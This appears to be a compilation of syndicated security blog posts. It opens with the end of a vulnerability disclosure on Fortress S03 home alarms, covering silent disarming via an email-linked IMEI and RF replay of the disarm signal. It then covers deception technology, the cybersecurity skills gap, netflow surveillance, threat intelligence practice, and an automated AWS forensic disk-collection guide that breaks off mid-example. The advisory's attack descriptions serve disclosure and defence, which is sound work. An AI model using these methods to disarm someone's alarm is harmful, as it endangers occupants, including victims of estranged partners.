[Image: SDR capture of the arm/disarm RF signals]
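To illustrate why a static RF code is replayable while a rotating-key scheme is not, here is a toy simulation in Python. This is not Fortress’s actual protocol; the shared secret, frame format, and counter scheme are invented for illustration:

```python
import hashlib
import hmac

SECRET = b"shared-fob-secret"  # hypothetical key provisioned into fob and console

def fob_send(counter: int, command: str) -> bytes:
    """A rolling-code fob authenticates the command plus a monotonic counter."""
    msg = f"{counter}:{command}".encode()
    return msg + b"|" + hmac.new(SECRET, msg, hashlib.sha256).digest()

class Console:
    """Receiver that rejects any frame whose counter it has already seen."""
    def __init__(self) -> None:
        self.last_counter = -1

    def receive(self, frame: bytes) -> bool:
        msg, _, tag = frame.partition(b"|")
        expected = hmac.new(SECRET, msg, hashlib.sha256).digest()
        if not hmac.compare_digest(tag, expected):
            return False               # forged or corrupted frame
        counter = int(msg.split(b":")[0])
        if counter <= self.last_counter:
            return False               # replayed frame: counter is not fresh
        self.last_counter = counter
        return True

console = Console()
frame = fob_send(1, "disarm")
assert console.receive(frame)          # legitimate press is accepted
assert not console.receive(frame)      # the same capture, replayed, is rejected
```

A fixed-code system is the degenerate case where no counter or authentication exists, so any captured frame stays valid forever, which is exactly what the SDR test demonstrated.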

Impact

For CVE-2021-39276, an attacker can use a Fortress S03 user’s email address to easily disarm the installed home alarm without the user’s knowledge. While this is not usually much of a concern for random, opportunistic home invaders, this is particularly concerning when the attacker already knows the victim well, such as an ex-spouse or other estranged relationship partner.

CVE-2021-39277 presents similar problems but requires less prior knowledge of the victim, as the attacker can simply stake out the property and wait for the victim to use the RF-controlled devices within radio range. The attacker can then replay the “disarm” command later, without the victim’s knowledge.

Mitigations

In the absence of a patch or update, to work around the IMEI number exposure described in CVE-2021-39276, users could configure their alarm systems with a unique, one-time email address. Many email systems allow for “plus tagging” an email address. For example, a user could register an address like “alice+fortressS03@example.com” and treat that plus-tagged email address as a stand-in for a password.

For CVE-2021-39277, there seems to be very little a user can do to mitigate the effects of the RF replay issues, absent a firmware update to enforce cryptographic controls on RF signals. Users concerned about this exposure should avoid using key fobs and other RF devices linked to their home security systems.

Disclosure Timeline

  • May 2021: Issues discovered by Arvind Vishwakarma of Rapid7
  • Thu, May 13, 2021: Initial contact to Fortress support email
  • Thu, May 13, 2021: Ticket #200781 created
  • Mon, May 24, 2021: Ticket #200781 closed by Fortress
  • Wed, Aug 18, 2021: Rapid7 created a follow up ticket, #203001, with vulnerability details and a reiteration of intent to publish
  • Tue, Aug 31, 2021: Published disclosure

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

[The Lost Bots] Episode 4: Deception Technology

Post Syndicated from Rapid7 original https://blog.rapid7.com/2021/08/30/the-lost-bots-episode-4-deception-technology/

[The Lost Bots] Episode 4: Deception Technology

Welcome back to The Lost Bots, a vlog series where Rapid7 Detection and Response Practice Advisor Jeffrey Gardner talks all things security with fellow industry experts. This episode is a little different, as it’s Jeffrey talking one-on-one with you about one of his favorite subjects: deception technology! Watch below to learn about the history, special characteristics, goals, and possible roadblocks (with counterpoints!) of what he likes to call “HoneyThings,” and also learn practical advice about the application of this amazing technology.



[Embedded video: The Lost Bots, Episode 4: Deception Technology]

Stay tuned for future episodes of The Lost Bots! Coming soon: Jeffrey tackles insider threats where the threat is definitely inside your organization, but maybe not in the way you think.

The Cybersecurity Skills Gap Is Widening: New Study

Post Syndicated from Jesse Mack original https://blog.rapid7.com/2021/08/27/the-cybersecurity-skills-gap-is-widening-new-study/

The Cybersecurity Skills Gap Is Widening: New Study

The era of COVID-19 has taught us all a few things about supply and demand. From the early days of toilet paper shortages to more recent used-car pricing shocks, the stress tests brought on by a global pandemic have revealed the extremely delicate balance of scarcity and surplus.

Another area seeing dramatic shortages? Cybersecurity skills. And just like those early lockdown days when we were frantically scouring picked-over supermarket shelves for the last pack of double-ply, it seems like security resources are growing scarcer just when we need them most.

A new study from the Information Systems Security Association (ISSA) reveals organizations are having serious trouble sourcing top-tier cybersecurity talent — despite their need to fill these roles growing more urgent by the day.

Mind the gap

The ISSA study paints a clear picture: Infosec teams are all too aware of the gap between the skills they need and resources they have on hand. Of the nearly 500 cybersecurity professionals surveyed in the study, a whopping 95% said the skills shortage in their field hasn’t improved in recent years.

Meanwhile, of course, cyber attacks have only grown more frequent in the era of COVID-19. And if more attacks are occurring while the skills shortage isn’t improving, there’s only one conclusion to make: The lack of cybersecurity know-how is getting worse, not better.

But despite almost universal acknowledgement of the problem, most organizations simply aren’t taking action to solve it. In fact, 59% of respondents to the ISSA study said their organizations could be doing more to address the lack of cybersecurity skills.

Room for improvement

Given the fact that the skills gap is so top-of-mind and widely felt across the industry, what factors are contributing to the lack of improvement on the issue? ISSA’s findings highlight some key areas where organizations are falling behind.

  • Getting talent in the door — For most organizations, finding the right people for the job is the root of the problem: 76% of respondents said hiring cybersecurity specialists is extremely or somewhat difficult.
  • Putting skin in the game — The top cause that ISSA survey respondents cited for their trouble attracting talent was compensation, with 38% reporting their organizations simply don’t offer enough pay to lure in cybersecurity experts.
  • Investing in long-term training — More than 4 out of 5 security pros surveyed said they have trouble finding time to keep their skills sharp and up-to-date while keeping up with the responsibilities of their current roles. Not surprisingly, increased investment in training was the No. 1 action respondents said their organizations should take to close the skills gap.
  • Alignment between business and security — Nearly a third of respondents said HR and cybersecurity teams aren’t on the same page when it comes to hiring priorities, and 28% said security pros and line-of-business leaders need to have stronger relationships.

For the ISSA researchers, the first step in addressing these shortcomings is a change in mindset, from thinking of security as a peripheral function to one that’s at the core of the business.

“There is a lack of understanding between the cyber professional side and the business side of organizations that is exacerbating the cyber-skills gap problem,” ISSA’s Board President Candy Alexander points out. She goes on to say, “Both sides need to re-evaluate the cybersecurity efforts to align with the organization’s business goals to provide the value that a strong cybersecurity program brings towards achieving the goals of keeping the business running.”

Time to catch up

The pace of innovation today is higher than ever before, as businesses roll out more and more new tech in an effort to create the best customer experiences and stay on the cutting edge of competition. But as this influx of tech hits the scene — from highly accessible cloud-based applications to IoT-connected devices — the number of risks these tools introduce to our lives and our business activities also grows. Meanwhile, attackers are only getting smarter, adjusting their techniques to the technologies that innovation-led businesses are bringing to market.

This is what we call the security achievement gap, and closing it raises some important questions. How can organizations bring on the best people when competition for talent is so high? What if your current budget simply doesn’t allow for the number of team members you really need to monitor your network against threats?

Cyber threats are becoming more frequent, network infrastructures are growing more complex — and unlike used cars, the surge in demand for cybersecurity know-how isn’t likely to let up any time soon. The time is now for organizations to ensure their cybersecurity teams have the skills, resources, and tools they need to think and act just as innovatively as other areas of the business.

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Surveillance of the Internet Backbone

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2021/08/surveillance-of-the-internet-backbone.html

Vice has an article about how data brokers sell access to the Internet backbone. This is netflow data. It’s useful for cybersecurity forensics, but can also be used for things like tracing VPN activity.

At a high level, netflow data creates a picture of traffic flow and volume across a network. It can show which server communicated with another, information that may ordinarily only be available to the server owner or the ISP carrying the traffic. Crucially, this data can be used for, among other things, tracking traffic through virtual private networks, which are used to mask where someone is connecting to a server from, and by extension, their approximate physical location.
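As a rough illustration of what netflow-style analysis looks like, the sketch below aggregates bytes per source/destination pair from hypothetical flow records (real NetFlow/IPFIX records carry many more fields, such as ports, protocol, and timestamps):

```python
from collections import defaultdict

# Hypothetical flow records as (src_ip, dst_ip, byte_count).
flows = [
    ("10.0.0.5", "203.0.113.7", 1200),
    ("10.0.0.5", "203.0.113.7", 800),
    ("10.0.0.9", "198.51.100.2", 400),
]

def traffic_by_pair(records):
    """Total bytes exchanged per (source, destination) pair."""
    totals = defaultdict(int)
    for src, dst, nbytes in records:
        totals[(src, dst)] += nbytes
    return dict(totals)
```

Even this tiny aggregate reveals which hosts talk to which, and how much; at backbone scale, the same picture can correlate traffic entering and leaving a VPN endpoint.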

In the hands of some governments, that could be dangerous.

[R]Evolution of the Cyber Threat Intelligence Practice

Post Syndicated from Alon Arvatz original https://blog.rapid7.com/2021/08/25/r-evolution-of-the-cyber-threat-intelligence-practice/

[R]Evolution of the Cyber Threat Intelligence Practice

The cyber threat intelligence (CTI) space is one of the most rapidly evolving areas in cybersecurity. Not only are technology and products constantly being updated and evolved, but so are methodologies and concepts. One of the key changes of the last few years is the transition from threat intelligence as a separate pillar — which disseminates threat reports to the security organization — to threat intelligence as a central hub that feeds all the functions in the security organization with knowledge and information on the most prioritized threats. This change requires a shift in both mindset and methodology.

Traditionally, CTI has been considered a standalone practice within the security organization. Whether the security organization has dedicated personnel or not, it has been a separate practice that produces reports about various threats to the organization — essentially, looking at the threat landscape and making the same threat data accessible to all the functions in the security organization.

Traditional CTI model

[R]Evolution of the Cyber Threat Intelligence Practice
A traditional model of the CISO and the different functions in their security organization

The latest developments in threat intelligence methodologies are disrupting this concept. Effectively, threat intelligence is no longer a separate pillar, but something that should be ingested and considered in every security device, process, and decision-making event. Thus, the mission of the threat intelligence practitioner is no longer to simply create “threat reports,” but also to make sure that every part of the security organization effectively leverages threat intelligence as part of its day-to-day mission of detection, response, and overall risk management.

The evolution of threat intelligence is supported by the following primary trends in the cybersecurity space:

  1. Automation — Due to a lack of trained human resources, organizations are implementing more automation into their security operations. Supported by the adoption of SOAR technologies, machine-to-machine communication is becoming much easier and more mainstream. Automation allows for pulling data from your CTI tools and constantly feeding it into various security devices and security processes, without human intervention — essentially supporting seamless, near-real-time integration of CTI into security devices as well as automated decision-making processes.
  2. Expanded access to threat intelligence — Threat intelligence vendors are investing a lot more in solutions that democratize threat intelligence and make it easy for various security practitioners to consume — for example, native applications for Security Information and Event Management (SIEM) to correlate threat data against internal logs, or browser extensions that inject threat context and risk analysis into the browser. Previously, you had lots of threat data that needed manual labor to review and take action; today, you have actionable insights that are seamlessly integrated into your security devices.
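As a toy example of the machine-to-machine pattern in the first trend, a SOAR job might filter and de-duplicate a raw indicator feed before pushing it to an enforcement point such as a firewall blocklist. The feed format and confidence threshold below are invented for illustration:

```python
def select_actionable_iocs(feed, min_confidence=80):
    """Filter and de-duplicate a raw intel feed down to indicators worth
    pushing automatically to an enforcement point."""
    return sorted({entry["indicator"]
                   for entry in feed
                   if entry["confidence"] >= min_confidence})

feed = [
    {"indicator": "198.51.100.7", "confidence": 95},
    {"indicator": "203.0.113.9", "confidence": 40},   # too low to auto-block
    {"indicator": "198.51.100.7", "confidence": 90},  # duplicate sighting
]
assert select_actionable_iocs(feed) == ["198.51.100.7"]
```

In a real pipeline, a step like this runs on a schedule with no human in the loop, which is precisely what turns threat data into continuously applied intelligence.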

Updated CTI model

[R]Evolution of the Cyber Threat Intelligence Practice
Today’s new model of the CISO and the role of threat intelligence in supporting the different functions in their organization

The new mission of the CTI practitioner

The new mission of the CTI practitioner is to tailor threat intelligence to every function in the security organization and make it an integral part of the function’s operations. This new approach requires them to not only update their mission, but also to gain new soft skills that allow them to collaborate with other functions in the security organization.

The CTI practitioner’s newly expanded mindset and skill set would include:

  1. Developing close relationships with various stakeholders — It’s not enough to send threat reports if the internal client doesn’t know how to consume them. What looks simple for a CTI specialist is not necessarily simple to other security practitioners. Thus, in order to achieve the CTI mission, it’s important to develop close relationships with various stakeholders so that the CTI specialist can better understand their pain points and requirements, as well as tailor the best solution for them to consume. This activity serves as a platform to raise their awareness of CTI’s value, thereby helping them come up with and commit to new processes that include CTI as part of their day-to-day.
  2. Having solid knowledge of the company strategy and operations — The key to a successful CTI program is relevancy; without relevancy, you’re left with lots of unactionable threat data. Relevancy is twice as important when you want to incorporate CTI into various functions within the organization. Relevant CTI can only be achieved when the company business, organizational chart, and strategy are clear. This clarity enables the CTI practitioner to realize what intelligence is relevant to each function and tailor it to the needs of each function.
  3. Deep understanding of the company tech stack — The CTI role requires not only business understanding, but also a deep technical understanding of the IT infrastructure and architecture. This knowledge will allow the CTI specialist to tailor the intelligence to the risks imposed on the company tech stack, and it will support building a plan to correlate internal logs against external threat intelligence.

Following are a few examples of processes the threat intelligence team needs to implement in order to tailor threat intelligence to other security functions and make it an integral part of their operations:

  1. Third-party breach monitoring — With the understanding that the weakest link might be your third party, there’s an increasing importance of timely detection of third-party breaches. CTI monitoring supports early detection of those cases and is followed by the IR team minimizing the risk. An example of this is monitoring ransomware gangs’ leak sites for any data belonging to your company that has been leaked from any third party.
  2. SOC incident triage — One of the main missions of the Security Operations Center (SOC) is to identify cyber incidents and make quick decisions on mitigation steps. This can be tremendously improved by using threat intelligence to triage the indicators (e.g., domains and IP addresses) of each event. Threat intelligence is the key to an effective and efficient triage of these events, and it can be easily delivered through a threat intelligence browser extension that triages the IOCs while the analyst is browsing in the SIEM.
  3. Vulnerability prioritization process — The traditional vulnerability prioritization process relies on the CVSS score and the criticality of the vulnerable assets. This focuses the prioritization efforts on the impact of an exploitation of the vulnerabilities and gives very little focus on the probability that these vulnerabilities will be exploited. Hacker chatter from the Dark Web and security researchers’ publications can help provide a good understanding of the probability that a certain vulnerability will actually be leveraged by a threat actor to launch a cyberattack. This probability factor is an essential missing piece in the vulnerability prioritization process.
  4. Trends analysis — The CTI practitioner has access to a variety of sources, allowing them to monitor trends in the cybersecurity domain, their specific industry, or in the data held in the company. This should be provided to leadership (not only security leadership) in order to allow smart, agile decision-making on existing risks.
  5. Threat intel and cybersecurity knowledge sharing — As with “traditional” intelligence, knowledge sharing can be a major force multiplier in cyber intelligence, too. Threat intel teams should aim to create as much external cooperation with other security teams — especially from the industry they work in — as they can. This will allow the team and the security organization to better understand the risks posed to the industry and, accordingly, their company. This information will also allow the CISO better visibility into the threat landscape that’s relevant to the company.
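The prioritization idea in the third process above can be sketched as a simple scoring function that multiplies impact by an intel-derived probability of exploitation. The weights and normalization below are purely illustrative, not a standard formula:

```python
def priority(cvss: float, asset_criticality: float, exploit_probability: float) -> float:
    """Blend impact (CVSS x asset criticality) with an intel-derived likelihood
    of exploitation. Both non-CVSS inputs are normalized to the 0-1 range."""
    impact = (cvss / 10.0) * asset_criticality
    return round(impact * exploit_probability, 3)

# A "critical" CVE with no observed exploitation vs. a "high" CVE with active
# Dark Web chatter and a public exploit:
quiet_critical = priority(cvss=9.8, asset_criticality=0.9, exploit_probability=0.05)
chatty_high = priority(cvss=7.5, asset_criticality=0.9, exploit_probability=0.80)
assert chatty_high > quiet_critical    # likelihood reorders the patch queue
```

The point of the sketch is the ordering, not the numbers: adding the probability factor can push an actively exploited "high" ahead of a theoretical "critical."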

A valuable proposition

While the evolving CTI model is making threat intelligence implementation a bit more complex, as it includes collaboration with different functions, it makes the threat intelligence itself far more valuable and impactful than ever before. The future of cyber threat intelligence is getting a lot more exciting!

How to automate forensic disk collection in AWS

Post Syndicated from Matt Duda original https://aws.amazon.com/blogs/security/how-to-automate-forensic-disk-collection-in-aws/

In this blog post you’ll learn about a hands-on solution you can use for automated disk collection across multiple AWS accounts. This solution will help your incident response team set up an automation workflow to capture the disk evidence they need to analyze to determine scope and impact of potential security incidents. This post includes AWS CloudFormation templates and all of the required AWS Lambda functions, so you can deploy this solution in your own environment. This post focuses primarily on two sources as the origination of the evidence collection workflow: AWS Security Hub and Amazon GuardDuty.

Why is automating forensic disk collection important?

AWS offers unique scaling capabilities in our compute environments. As you begin to increase your number of compute instances across multiple AWS accounts or organizations, you will find operational aspects of your business that must also scale. One of these critical operational tasks is the ability to quickly gather forensically sound disk and memory evidence during a security event.

During a security event, your incident response (IR) team must be able to collect and analyze evidence quickly while maintaining accuracy for the time period surrounding the event. It is both challenging and time-consuming for the IR team to manually collect all of the relevant evidence in a cloud environment, across a large number of instances and accounts. Additionally, manual collection requires time that could otherwise be spent analyzing and responding to an event. Every role assumption, every console click, and every manual trigger required by the IR team, adds time for an attacker to continue to work through systems to meet their objectives.

Indicators of compromise (IoCs) are pieces of data that IR teams often use to identify potential suspicious activity within networks that might need further investigation. These IoCs can include file hashes, domains, IP addresses, or user agent strings. IoCs are used by services such as GuardDuty to help you discover potentially malicious activity in your accounts. For example, when you are alerted that an Amazon Elastic Compute Cloud (Amazon EC2) instance contains one or more IoCs, your IR team must gather a point-in-time copy of relevant forensic data to determine the root cause, and evaluate the likelihood that the finding requires action. This process involves gathering snapshots of any and all attached volumes, a live dump of the system’s memory, a capture of the instance metadata, and any logs that relate to the instance. These sources help your IR team to identify next steps and work towards a root cause.

It is important to take a point-in-time snapshot of an instance as close in time to the incident as possible. If there is a delay in capturing the snapshot, evidence can be altered or rendered unusable because the data has changed or been deleted. To take this snapshot quickly, you need a way to automate the collection and delivery of potentially hundreds of disk images while ensuring each snapshot is collected in the same way and without creating a bottleneck in the pipeline that could reduce the integrity of the evidence. In this blog post, I explain the details of the automated disk collection workflow, and explain why you might make different design decisions. You can download the solutions in CloudFormation, so that you can deploy this solution and get started on your own forensic automation workflows.

AWS Security Hub provides an aggregated view of security findings across AWS accounts, including findings produced by GuardDuty, when enabled. Security Hub also provides you with the ability to ingest custom or third-party findings, which makes it an excellent starting place for automation. This blog post uses EC2 GuardDuty findings collected into Security Hub as the example, but you can also use the same process to include custom detection events, or alerts from partner solutions such as CrowdStrike, McAfee, Sophos, Symantec, or others.

Infrastructure overview

The workflow described in this post automates the tasks that an IR team commonly takes during the course of an investigation.

Overview of disk collection workflow

The high-level disk collection workflow steps are as follows:

  1. Create a snapshot of each Amazon Elastic Block Store (Amazon EBS) volume attached to suspected instances.
  2. Create a folder in the Amazon Simple Storage Service (Amazon S3) evidence bucket with the original event data.
  3. Launch one Amazon EC2 instance per EBS volume, to be used in streaming a bit-for-bit copy of the EBS snapshot volume. These EC2 instances are launched without SSH key pairs, to help prevent any unintentional evidence corruption and to ensure consistent processing without user interaction. The EC2 instances use third-party tools dc3dd and incrond to trigger and process volumes.
  4. Write all logs from the workflow and instances to Amazon CloudWatch Logs log groups, for audit purposes.
  5. Include all EBS volumes in the S3 evidence bucket as raw image files (.dd), with the metadata from the automated capture process, as well as hashes for validation and verification.
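The first step above could be sketched with boto3 roughly as follows. The function names, tag keys, and incident-ID convention are illustrative, not the ones used in the post's Lambda functions:

```python
def snapshot_tags(incident_id: str, instance_id: str, volume_id: str) -> list:
    """Tags tying each snapshot back to the originating finding (illustrative)."""
    return [
        {"Key": "IncidentId", "Value": incident_id},
        {"Key": "SourceInstance", "Value": instance_id},
        {"Key": "SourceVolume", "Value": volume_id},
    ]

def snapshot_attached_volumes(instance_id: str, incident_id: str) -> list:
    """Create a point-in-time snapshot of every EBS volume attached to an instance."""
    import boto3  # local import so the pure helper above can be exercised offline
    ec2 = boto3.client("ec2")
    instance = ec2.describe_instances(InstanceIds=[instance_id])[
        "Reservations"][0]["Instances"][0]
    snapshot_ids = []
    for mapping in instance.get("BlockDeviceMappings", []):
        volume_id = mapping["Ebs"]["VolumeId"]
        snap = ec2.create_snapshot(
            VolumeId=volume_id,
            Description=f"Forensic capture for incident {incident_id}",
            TagSpecifications=[{
                "ResourceType": "snapshot",
                "Tags": snapshot_tags(incident_id, instance_id, volume_id),
            }],
        )
        snapshot_ids.append(snap["SnapshotId"])
    return snapshot_ids
```

Tagging each snapshot at creation time is what lets the later steps (copying, sharing, and streaming to S3) stay correlated to the original finding without manual bookkeeping.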

Overview of AWS services used in the workflow

Another way of looking at this high-level workflow is from the service perspective, as shown in Figure 1.

Figure 1: Service workflow for forensic disk collection

Figure 1: Service workflow for forensic disk collection

The workflow in Figure 1 shows the following steps:

  1. A GuardDuty finding is triggered for an instance in a monitored account. This example focuses on a GuardDuty finding, but the initial detection source can also be a custom event, or an event from a third party.
  2. The Security Hub service in the monitored account receives the GuardDuty finding, and forwards it to the Security Hub service in the security account.
  3. The Security Hub service in the security account receives the monitored account’s finding.
  4. The Security Hub service creates an event over Amazon EventBridge for the GuardDuty findings, which an EventBridge rule then catches and forwards to the DiskForensicsInvoke Lambda function. The following is the example event rule, which is included in the deployment. This example can be expanded or reduced to fit your use case. By default, the example is set to disabled in CloudFormation. When you are ready to use the automation, you will need to enable it.
    {
      "detail-type": [
        "Security Hub Findings - Imported"
      ],
      "source": [
        "aws.securityhub"
      ],
      "detail": {
        "findings": {
          "ProductFields": {
            "aws/securityhub/SeverityLabel": [
              "CRITICAL",
              "HIGH",
              "MEDIUM"
            ],
            "aws/securityhub/ProductName": [
              "GuardDuty"
            ]
          }
        }
      }
    }
    

  5. The DiskForensicsInvoke Lambda function receives the event from EventBridge, formats the event, and provides the formatted event as input to AWS Step Functions workflow.
  6. The DiskForensicStepFunction workflow includes ten Lambda functions, from initial snapshot to streaming the evidence to the S3 bucket. After the Step Functions workflow enters the CopySnapshot state, it converts to a map state. This allows the workflow to have one thread per volume submitted, and ensures that each volume will be placed in the evidence bucket as quickly as possible without needing to wait for other steps to complete.
    Figure 2: Forensic disk collection Step Function workflow

    Figure 2: Forensic disk collection Step Function workflow

    As shown in Figure 2, the following are the embedded Lambda functions in the DiskForensicStepFunction workflow:

    1. CreateSnapshot – This function creates the initial snapshots for each EBS volume attached to the instance in question. It also records instance metadata that is included with the snapshot data for each EBS volume.
      Required Environmental Variables: ROLE_NAME, EVIDENCE_BUCKET, LOG_GROUP
    2. CheckSnapshot – This function checks to see if the snapshots from the previous step are completed. If not, the function retries with an exponential backoff.
      Required Environmental Variable: ROLE_NAME
    3. CopySnapshot – This function copies the initial snapshot and ensures that it is using the forensics AWS Key Management Service (AWS KMS) key. This key is stored in the security account and will be used throughout the remainder of the process.
      Required Environmental Variables: ROLE_NAME, KMS_KEY
    4. CheckCopySnapshot – This function checks to see if the snapshot from the previous step is completed. If not, the function retries with exponential backoff.
      Required Environmental Variable: ROLE_NAME
    5. ShareSnapshot – This function takes the copied snapshot using the forensics KMS key, and shares it with the security account.
      Required Environmental Variables: ROLE_NAME, SECURITY_ACCOUNT
    6. FinalCopySnapshot – This function copies the shared snapshot into the security account, as the original shared snapshot is still owned by the monitored account. This ensures that a copy is available, in case it has to be referenced for additional processing later.
      Required Environmental Variable: KMS_KEY
    7. FinalCheckSnapshot – This function checks to see if the snapshot from the previous step is completed. If not, the function fails, and the workflow retries it with exponential backoff.
    8. CreateVolume – This function creates an EBS Magnetic volume from the snapshot taken in the previous step. The volume uses magnetic disks because they are required for consistent hash results from the dc3dd process; a solid state drive (SSD) would produce a different hash each time. If the volume size is greater than or equal to 500GB, Amazon EBS switches from standard EBS Magnetic volumes to Throughput Optimized HDD (st1) volumes.
      Required Environmental Variables: KMS_KEY, SUPPORTED_AZS
    9. RunInstance – This function launches one EC2 instance per volume, to be used in streaming the volume to the S3 bucket. The AMI passed by the environmental variable needs to be created using the provided Amazon EC2 Image Builder pipeline before deploying the environment. This function also passes user data to the instance: the artifact bucket, the source volume name, and the incident ID. The instance uses this information when placing the evidence into the S3 bucket.
      Required Environmental Variables: AMI_ID, INSTANCE_PROFILE_NAME, VPC_ID, SECURITY_GROUP
    10. CreateInstanceWait – This function creates a 30-second wait, to allow the instance some additional time to spin up.
    11. MountForensicVolume – This function checks the CloudWatch log group ForensicDiskReadiness, to see that the incrond service is running on the instance. If the incrond service is running, the function attaches the volume to the instance and then writes the final logs to the S3 bucket and CloudWatch Logs.
      Required Environmental Variable: LOG_GROUP
  7. The instance that is created has pre-built tools and scripts on it from the template below, built using Image Builder. The instance uses the incrond tool to monitor /dev/disk/by-label for new devices being attached. After the MountForensicVolume Lambda function attaches the volume, a file is created in the /dev/disk/by-label directory for the attached volume. The incrond daemon starts the orchestrator script, which calls the collector script. The collector script uses the dc3dd tool to stream a bit-for-bit copy of the volume to S3. After the copy has completed, the instance shuts down and is terminated. All logs from the process are sent to the S3 bucket and CloudWatch Logs.
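The CheckSnapshot, CheckCopySnapshot, and FinalCheckSnapshot steps above all share the same pattern: poll a resource's state, and back off exponentially between attempts. A minimal, generic sketch of that pattern is below; the function name and parameters are illustrative, and in the real Lambda functions the check would wrap an `ec2.describe_snapshots` call testing for `State == "completed"`.

```python
import time

def wait_with_backoff(check_complete, max_attempts=8, base_delay=1.0, sleep=time.sleep):
    """Poll until check_complete() returns True, doubling the delay after each
    unsuccessful attempt. Returns False if all attempts are exhausted, which in
    the Step Functions workflow would surface as a failed state to be retried."""
    delay = base_delay
    for _ in range(max_attempts):
        if check_complete():
            return True
        sleep(delay)
        delay *= 2  # exponential backoff: 1s, 2s, 4s, ...
    return False
```

Injecting the `sleep` function keeps the helper testable without real waits; a Lambda implementation would simply use the default `time.sleep`.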

The solution provided in this post includes the CloudFormation templates you need to get started, except for the creation of the initial EventBridge rule (which is provided in step 4 of the previous section). The solution includes an isolated VPC, subnets, security groups, roles, and more. The VPC deliberately provides no egress through an internet gateway or NAT gateway, and that is the recommended configuration. The only connectivity is through the S3 gateway VPC endpoint and the CloudWatch Logs interface VPC endpoint (both also deployed by the template).

Deploy the CloudFormation templates

To implement the solution outlined in this post, you need to deploy three separate AWS CloudFormation templates in the order described in this section.

diskForensicImageBuilder (security account)

First, you deploy diskForensicImageBuilder in the security account. This template contains the resources and AMIs needed to create and run the Image Builder pipeline that builds the collector VM. This pipeline installs the required binaries and scripts, and updates the system.

Note: diskForensicImageBuilder is configured to use the default VPC and security group. If you have added restrictions or deleted your default VPC, you will need to modify the template.

To deploy the diskForensicImageBuilder template

  1. To open the AWS CloudFormation console pre-loaded with the template, choose the following Launch Stack button.
    Select the Launch Stack button to launch the template
  2. In the AWS CloudFormation console, on the Specify Details page, enter a name for the stack.
  3. Leave all default settings in place, and choose Next to configure the stack options.
  4. Choose Next to review and scroll to the bottom of the page. Select the check box under the Capabilities section, next to the acknowledgement:
    • I acknowledge that AWS CloudFormation might create IAM resources with custom names.
  5. Choose Create Stack.
  6. After the Image Builder pipeline has been created, on the Image pipelines page, choose Actions and select Run pipeline to manually run the pipeline to create the base AMI.

    Figure 3: Run the new Image Builder pipeline

diskForensics (security account)

Second, you deploy diskForensics in the security account. This is a nested CloudFormation stack that contains the following four templates:

  1. forensicResources – This stack holds all of the foundation for the solution, including the VPC and networking components, the S3 evidence bucket, CloudWatch log groups, and collectorVM instance profile.

    Figure 4: Forensics VPC

  2. forensicFunctions – This stack contains all of the Lambda functions referenced in the Step Functions workflow as well as the role used by the Lambda functions.
  3. forensicStepFunction – This stack contains the Step Functions code, the role used by the Step Functions service, and the CloudWatch log group used by the service. It also contains an Amazon Simple Notification Service (Amazon SNS) topic used to alert on pipeline failure.
  4. forensicStepFunctionInvoke – This stack contains the DiskForensicsInvoke Lambda function and the role that allows the function to invoke the Step Functions workflow.

Note: You need to have the following required variables to continue:

  • ArtifactBucketName
  • ORGID
  • ForensicsAMI

If your accounts are not part of AWS Organizations, you can use a dummy string for now; the ORGID value only adds a condition statement to the forensics KMS key, which you can update or remove later.

To deploy the diskForensics stack

  1. To open the AWS CloudFormation console pre-loaded with the template, choose the following Launch Stack button.
    Select the Launch Stack button to launch the template
  2. In the AWS CloudFormation console, on the Specify Details page, enter a name for the stack.
  3. For the ORGID field, enter the AWS Organizations ID.

    Note: If you are not using AWS Organizations, leave the default string. If you are deploying as multi-account without AWS Organizations, you will need to update the KMS key policy to remove the principalOrgID condition statements and add the correct principals.

  4. For the ArtifactBucketName field, enter the S3 bucket name you would like to use for your forensic artifacts.

    Important: The ArtifactBucketName must be a globally unique name.

  5. For the ForensicsAMI field, enter the AMI ID for the image that was created by Image Builder.
  6. For the example in this post, leave the default values for all other fields. Adjusting these fields lets you tailor this code example for your own purposes.
  7. Choose Next to configure the stack options and leave all default settings in place.
  8. Choose Next to review and scroll to the bottom of the page. Select the two check boxes under the Capabilities section, next to each of the acknowledgements:
    • I acknowledge that AWS CloudFormation might create IAM resources with custom names.
    • I acknowledge that AWS CloudFormation might require the following capability: CAPABILITY_AUTO_EXPAND.
  9. Choose Create Stack.
  10. After the stack has completed provisioning, subscribe to the Amazon SNS topic to receive pipeline alerts.

diskMember (each monitored account)

Third, you deploy diskMember in each monitored account. This stack contains the role and policy that the automation workflow needs to assume, so that it can create the initial snapshots and share the snapshot with the security account. If you are deploying this solution in a single account, you deploy diskMember in the security account.

Important: Ensure that all KMS keys that could be used to encrypt EBS volumes in each monitored account grant this role the ability to perform the CreateGrant, Encrypt, Decrypt, ReEncrypt*, GenerateDataKey*, and DescribeKey actions. The default policy grants these permissions in AWS Identity and Access Management (IAM), but any restrictive resource policies could block the ability to create the initial snapshot and to decrypt the snapshot when making the copy.
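As a sketch, a key policy statement granting those actions might look like the following. The account ID (111122223333) and the role name (DiskForensicAutomationRole) are placeholders, not values from the solution; substitute the monitored-account ID and the role created by the diskMember stack.

```json
{
  "Sid": "AllowForensicAutomationRole",
  "Effect": "Allow",
  "Principal": {
    "AWS": "arn:aws:iam::111122223333:role/DiskForensicAutomationRole"
  },
  "Action": [
    "kms:CreateGrant",
    "kms:Encrypt",
    "kms:Decrypt",
    "kms:ReEncrypt*",
    "kms:GenerateDataKey*",
    "kms:DescribeKey"
  ],
  "Resource": "*"
}
```

In a KMS key policy, `"Resource": "*"` refers to the key the policy is attached to, so this statement does not grant access to other keys.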

To deploy the diskMember stack

  1. To open the AWS CloudFormation console pre-loaded with the template, choose the following Launch Stack button.
    Select the Launch Stack button to launch the template
    If deploying across multiple accounts, consider using AWS CloudFormation StackSets for simplified multi-account deployment.
  2. In the AWS CloudFormation console, on the Specify Details page, enter a name for the stack.
  3. For the MasterAccountNum field, enter the account number for your security administrator account.
  4. Choose Next to configure the stack options and leave all default settings in place.
  5. Choose Next to review and scroll to the bottom of the page. Select the check box under the Capabilities section, next to the acknowledgement:
    • I acknowledge that AWS CloudFormation might create IAM resources with custom names.
  6. Choose Create Stack.

Test the solution

Next, you can try this solution with an event sample to start the workflow.

To initiate a test run

  1. Copy the following example GuardDuty event. The example uses the AWS Region us-east-1, but you can update the example to use another Region. Be sure to replace the account ID 0123456789012 with the account number of your monitored account, and replace the instance ID i-99999999 with the instance ID you would like to capture.
    {
      "SchemaVersion": "2018-10-08",
